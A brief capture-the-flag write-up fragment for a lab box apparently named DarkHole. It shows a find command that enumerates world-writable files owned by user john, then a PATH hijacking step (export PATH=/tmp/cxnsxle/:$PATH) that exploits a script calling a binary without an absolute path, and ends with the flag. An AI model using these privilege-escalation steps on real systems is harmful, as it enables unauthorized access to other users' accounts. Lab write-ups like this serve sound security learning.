I found a interesting binary with this command
find / -not -type l -perm -o+w -user john 2>/dev/null
But this script is not using ABSOLUTE path of that binary
I used that to escalate to john by doing a PATH HIJACKING
export PATH=/tmp/cxnsxle/:$PATH
DarkHole{You_Can_DO_It}